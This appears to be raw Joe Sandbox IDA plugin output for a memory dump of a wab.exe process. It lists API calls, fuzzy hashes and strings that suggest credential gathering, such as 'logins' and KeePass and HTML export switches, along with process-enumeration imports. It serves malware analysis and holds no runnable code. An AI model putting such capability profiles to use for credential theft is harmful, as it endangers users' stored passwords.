                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                      • API String ID: 2899246560-1542517562
                                                                                                                                                                                                                      • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                      • API String ID: 3330709923-517860148
                                                                                                                                                                                                                      • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                        • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                                      • _wtoi.MSVCRT ref: 004081AF
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                                      • String ID: logins$null
                                                                                                                                                                                                                      • API String ID: 3492182834-2163367763
                                                                                                                                                                                                                      • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 004086DB
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 004086FA
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 0040876B
• ??3@YAXPAX@Z.MSVCRT ref: 0040879D
• CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
• String ID: ---
• API String ID: 3437578500-2854292027
• Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
• Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
• Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
• Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
Uniqueness
• Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0041087D
• memset.MSVCRT ref: 00410892
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
• SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
• SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
• SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
• GetModuleHandleW.KERNEL32(00000000), ref: 00410951
• LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
• GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
• LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
• GetSysColor.USER32(0000000F), ref: 00410999
• DeleteObject.GDI32(?), ref: 004109D0
• DeleteObject.GDI32(?), ref: 004109D6
• SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 1010922700-0
• Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
• Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
• Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
• Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
• malloc.MSVCRT ref: 004186B7
• ??3@YAXPAX@Z.MSVCRT ref: 004186C7
• GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
• ??3@YAXPAX@Z.MSVCRT ref: 004186E0
• GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
• malloc.MSVCRT ref: 004186FE
• GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
• ??3@YAXPAX@Z.MSVCRT ref: 00418716
• ??3@YAXPAX@Z.MSVCRT ref: 0041872A
• ??3@YAXPAX@Z.MSVCRT ref: 00418749
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??3@$FullNamePath$malloc$Version
• String ID: |A
• API String ID: 4233704886-1717621600
• Opcode ID: c2466c63737be692c3a7dfafc6e02f378046f46b324897726c23362a1a564614
• Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
• Opcode Fuzzy Hash: c2466c63737be692c3a7dfafc6e02f378046f46b324897726c23362a1a564614
• Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 2081463915-1959339147
• Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
• Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
• Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
• Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
• FreeLibrary.KERNEL32(00000000), ref: 00413951
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2012295524-70141382
• Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
• Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
• Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
• Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
• Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
• Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0041234D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1700100422-0
                                                                                                                                                                                                                      • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 552707033-0
                                                                                                                                                                                                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040C11B
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                                      • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                                      • String ID: 4$h
                                                                                                                                                                                                                      • API String ID: 4066021378-1856150674
                                                                                                                                                                                                                      • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                                                                                      • String ID: %%0.%df
                                                                                                                                                                                                                      • API String ID: 3473751417-763548558
                                                                                                                                                                                                                      • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
• KillTimer.USER32(?,00000041), ref: 004060D7
• KillTimer.USER32(?,00000041), ref: 004060E8
• GetTickCount.KERNEL32 ref: 0040610B
• GetParent.USER32(?), ref: 00406136
• SendMessageW.USER32(00000000), ref: 0040613D
• BeginDeferWindowPos.USER32(00000004), ref: 0040614B
• EndDeferWindowPos.USER32(00000000), ref: 0040619B
• InvalidateRect.USER32(?,?,00000001), ref: 004061A7
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
• String ID: A
• API String ID: 2892645895-3554254475
• Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
• Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
• Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
• Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadMenuW.USER32(?,?), ref: 0040D97F
  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
• DestroyMenu.USER32(00000000), ref: 0040D99D
• CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
• GetDesktopWindow.USER32 ref: 0040D9FD
• CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
• memset.MSVCRT ref: 0040DA23
• GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
• EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
• DestroyWindow.USER32(00000005), ref: 0040DA70
  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
